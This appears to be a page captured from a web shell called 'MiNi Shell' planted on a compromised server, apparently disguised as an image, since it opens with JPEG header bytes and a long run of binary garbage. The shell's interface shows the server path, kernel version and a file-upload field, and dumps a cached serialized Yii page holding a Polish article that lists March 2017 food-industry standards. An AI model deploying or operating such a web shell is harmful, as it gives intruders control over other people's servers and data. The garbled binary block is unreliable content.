JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/c5/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/cache/c5/c522f8bee98267ec8cb10c426ce00200.bin

a:2:{i:0;a:2:{i:0;s:13327:" 
                    
                    <h3 class="title" itemprop="headline">Polskie Normy dotyczące branży spożywczej - marzec 2017</h3>
                    <p><span class="glyphicon glyphicon-time" aria-hidden="true"></span> <strong itemprop="datePublished"> 03-04-2017, 00:00</strong>
                        <meta itemprop="dateModified" content=" 03-04-2017, 00:00"/>
                        <div class="hide" itemprop="description">
	Zestawienie Polskich Norm dotyczących branży spożywczej - marzec 2017</div>
                        <div class="hide" itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
                            <meta itemprop="name" content="jedzenie.info.pl">
                            <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
                                <meta itemprop="url" content="https://www.jedzenie.info.pl/images/loga/jedzenie.jpg">
                            </div>
                        </div>
                        <div class="hide" itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
                            <meta itemprop="url" content="https://common.v-manager.pl/uploads/images/articles/60876/crop/800x600/7194265d3e-693182001571974129.webp">
                        </div>
                        <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.jedzenie.info.pl/artykuly/szczegoly/60876"/>
                        
                                        </p>

                    <div class="lorem">
                        <h3 style="text-align:center;">
	<span style="color:rgb(0,51,51);">Zestawienie Polskich Norm dotyczących branży spożywczej</span></h3>
<h3 style="text-align:center;">
	<span style="color:rgb(0,51,51);">- marzec 2017</span></h3>
<h4>
	<br />
	<span style="color:#cc6600;"><strong>PN-EN ISO 3960:2017-03 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>14-03-2017</p>
<p>
	Oleje i tłuszcze roślinne oraz zwierzęce -- Oznaczanie liczby nadtlenkowej -- Jodometryczne (wizualne) oznaczanie punktu końcowego</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszym dokumencie opisano metodę jodometrycznego oznaczania liczby nadtlenkowej tłuszczów i olejów zwierzęcych oraz roślinnych, w której punkt końcowy określany jest wizualnie. Liczba nadtlenowa jest miarą ilości tlenu połączonego chemicznie z olejem lub tłuszczem w postaci nadtlenków, szczególnie wodoronadtlenków. Metodę stosuje się do wszystkich zwierzęcych i roślinnych tłuszczów oraz olejów, kwasów tłuszczowych, a także ich mieszanin, wykazujących liczbę nadtlenkową od 0 meq do 30 meq (milirównoważników) aktywnego tlenu na kilogram. Może być ona również stosowana do margaryn oraz tłuszczów do smarowania o różnej zawartości wody. Metoda ta nie jest odpowiednia do tłuszczów mlecznych ani nie stosuje się jej do lecytyn. Należy zauważyć, że liczba nadtlenkowa jest parametrem dynamicznym, którego wartość zależy od historii próbki. Ponadto, oznaczanie liczby nadtlenkowej jest procedurą w dużym stopniu empiryczną, a uzyskana wartość zależna jest od masy próbki. Podkreśla się, że z uwagi na wymaganą masę próbki, uzyskane liczby nadtlenkowe mogą być nieco niższe niż w przypadku użycia próbki o mniejszej masie.</p>
<p>
	Mleko i przetwory mleczne (lub tłuszcz pochodzący z mleka i produktów mlecznych) są wyłączone z zakresu niniejszego dokumentu.</p>
<p>
	UWAGA 1 Preferowana metoda jodometrycznego oznaczania liczby nadtlenkowej tłuszczów mlecznych opisana jest w ISO 3976.</p>
<p>
	UWAGA 2 Metodę potencjometrycznego oznaczania liczby nadtlenkowej podano w ISO 27107</p>
<p>
	 </p>
<h4>
	<span style="color:#cc6600;"><strong>PN-EN ISO 663:2017-03 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji:</strong> 14-03-2017</p>
<p>
	Oleje i tłuszcze roślinne oraz zwierzęce -- Oznaczanie zawartości zanieczyszczeń nierozpuszczalnych</p>
<p>
	<strong><span style="color:#008080;">Zakres</span></strong></p>
<p>
	W niniejszym dokumencie opisano metodę oznaczania zawartości zanieczyszczeń nierozpuszczalnych w tłuszczach i olejach zwierzęcych oraz roślinnych.</p>
<p>
	Jeśli nie jest wymagane uwzględnienie mydeł (zwłaszcza mydeł wapniowych) lub utlenionych kwasów tłuszczowych w zawartości zanieczyszczeń nierozpuszczalnych, koniecznym jest użycie odmiennego rozpuszczalnika i procedury. W takim przypadku powinno zostać osiągnięte porozumienie pomiędzy uczestniczącymi stronami.</p>
<p>
	Mleko i przetwory mleczne (lub tłuszcz pochodzący z mleka i produktów mlecznych) są wyłączone z zakresu niniejszego dokumentu.</p>
<p>
	 </p>
<h4>
	<span style="color:#cc6600;"><strong>PN-EN ISO 8534:2017-03 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji:</strong> 14-03-2017</p>
<p>
	Oleje i tłuszcze roślinne oraz zwierzęce -- Oznaczanie zawartości wody -- Metoda Karla Fischera (wolna od pirydyny)</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszym dokumencie podano metodę oznaczania zawartości wody w olejach i tłuszczach roślinnych oraz zwierzęcych (zwanych dalej tłuszczami) z zastosowaniem aparatury Karla Fischera i odczynnika wolnego od pirydyny.<br />
	Mleko i przetwory mleczne (lub tłuszcz pochodzący z mleka i produktów mlecznych) są wyłączone z zakresu niniejszego dokumentu.</p>
<p>
	 </p>
<h4>
	<strong style="color:rgb(204,102,0);">PN-EN ISO 18465:2017-03 - wersja angielska</strong></h4>
<p>
	<strong>Data publikacji: </strong>17-03-2017</p>
<p>
	Mikrobiologia łańcucha żywnościowego -- Ilościowe oznaczanie toksyny emetycznej (cereulidu) przy zastosowaniu LC-MS/MS</p>
<p>
	<strong><span style="color:#008080;">Zakres</span></strong></p>
<p>
	Niniejszy dokument opisuje ilościową analizę cereulidowej toksyny emetycznej przy zastosowaniu wysokosprawnej chromatografii cieczowej (HPLC) lub ultra sprawnej chromatografii cieczowej (UPLC) połączonej z tandemową spektrometrią mas (LC-MS/MS).<br />
	Niniejsza norma ma zastosowanie do analizy toksyny w produktach przeznaczonych do spożycia przez człowieka</p>
<h4>
	 </h4>
<h4>
	<span style="color:#cc6600;"><strong>PN-EN ISO 6883:2017-03 - wersja angielska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>17-03-2017</p>
<p>
	Oleje i tłuszcze roślinne oraz zwierzęce -- Oznaczanie umownego stosunku masy do objętości (ciężar litra w powietrzu)</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszym dokumencie określono metodę oznaczania umownego stosunku masy do objętości ("ciężar litra w powietrzu") olejów i tłuszczów roślinnych oraz zwierzęcych (zwanych dalej tłuszczami) stosowaną dla przeliczania objętości na masę lub masy na objętość.</p>
<p>
	Metoda ta nadaje się jedynie do tłuszczów w stanie ciekłym. Mleko i przetwory mleczne (lub tłuszcz pochodzący z mleka i produktów mlecznych) są wyłączone z zakresu niniejszego dokumentu. UWAGA Oznaczanie umownego stosunku masy do objętości (ciężar litra w powietrzu) metodą oscylacyjną za pomocą U-rurki można znaleźć w ISO 18301.</p>
<p>
	 </p>
<h4>
	<strong><span style="color:#cc6600;">PN-EN ISO 15774:2017-03 - wersja angielska</span></strong></h4>
<p>
	<strong>Data publikacji: </strong>27-03-2017</p>
<p>
	Oleje i tłuszcze roślinne oraz zwierzęce -- Oznaczanie zawartości kadmu metodą bezpośrednią z zastosowaniem techniki atomowej spektrometrii absorpcyjnej w piecu grafitowym</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszym dokumencie opisano metodę oznaczania śladowych ilości kadmu (mikrogram na kilogram) we wszystkich surowych i rafinowanych olejach i tłuszczach.<br />
	Mleko i przetwory mleczne (lub tłuszcz pochodzący z mleka i produktów mlecznych) są wyłączone z zakresu niniejszego dokumentu.</p>
<p>
	 </p>
<h4>
	<span style="color:#cc6600;"><strong>PN-ISO 13580:2017-03 - wersja polska</strong></span></h4>
<p>
	<strong>Data publikacji:</strong> 27-03-2017</p>
<p>
	Jogurt -- Oznaczanie zawartości całkowitej suchej masy (Metoda odniesienia)</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszej Normie Międzynarodowej określono metodę odniesienia oznaczania zawartości całkowitej suchej masy w jogurtach naturalnych, smakowych, słodzonych i owocowych.</p>
<p>
	 </p>
<h4>
	<span style="color:#cc6600;"><strong>PN-ISO 6092:2017-03 - wersja polska</strong></span></h4>
<p>
	<strong>Data publikacji: </strong>27-03-2017</p>
<p>
	Mleko w proszku -- Oznaczanie kwasowości miareczkowej (Metoda rutynowa)</p>
<p>
	<span style="color:#008080;"><strong>Zakres</strong></span></p>
<p>
	W niniejszej Normie Międzynarodowej określono rutynową metodę oznaczania kwasowości miareczkowej dla wszystkich typów mleka w proszku.</p>
<div>
	<hr />
	<p style="text-align:right;">
		Zestawienie zostało opracowane przez Redakcję Jedzenie.info.pl<br />
		na podstawie ogólnodostępnych informacji publikowanych przez PKN.</p>
</div>                        
                         
 
                        <div class="googleads-article">
<!-- script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script -->
<!-- vManager - w treści artykułu 2 -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6177099932506559"
     data-ad-slot="9192484574"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
                        </div>


                           
                    </div>
                    
                    <div class="text-center">
                                        </div>

                                            
                      
                        
                        
                    
                                        <div class="portal-light-background p1em mt1" itemprop="author" itemscope itemtype="https://schema.org/Person">
                        <strong>Źródło:</strong> 
                        <span itemprop="name">
                                                            <a href="http://www.pkn.pl" target="_blank">
                                                    
                            Polski Komitet Normalizacyjny                                                        
                                                            </a>
                                                    </span>
                        <br>
                    </div>
                                        
                                            <div class="nav-table tags mt05">
                            <div>Tagi:</div>    
                            <div>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Polski+Komitet+Normalizacyjny" class="label label-default">Polski Komitet Normalizacyjny</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Polskie+Normy" class="label label-default">Polskie Normy</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=zestawienie" class="label label-default">zestawienie</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=marzec+2017" class="label label-default">marzec 2017</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=branża+spożywcza" class="label label-default">branża spożywcza</a>
                                                            </div>
                        </div>
                                            
                        
                    <div id="fb-root"></div>
                    <!--script async defer crossorigin="anonymous" src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0" nonce="2g9iczzS"></script-->
                    
<script>
//<![CDATA[
var lx=!1;window.addEventListener("scroll",function(){(0!=document.documentElement.scrollTop&&!1===lx||0!=document.body.scrollTop&&!1===lx)&&(!function(){var e=document.createElement("script");e.type="text/javascript",e.async=!0,e.src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(),lx=!0)},!0);
//]]>
</script>
                    
                    <div class="social text-center mb1">
                        <div class="fb-like" data-href="https://www.jedzenie.info.pl/artykuly/szczegoly/60876_polskie-normy-dotyczace-branzy-spozywczej-marzec-2017" data-width="" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div>
                    </div>

                    
                    <div id="articles">    
                        
                    
                                    ";i:1;N;}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:2:{i:0;s:13:"article_60876";i:1;s:8:"articles";}s:4:"data";a:2:{s:32:"f1da5e2b4c1f836b2d842874869ac817";s:21:"0.20599800 1746429523";s:32:"9f4ebfa1b76d6bc6617aec9034853422";s:21:"0.22954000 1749980350";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com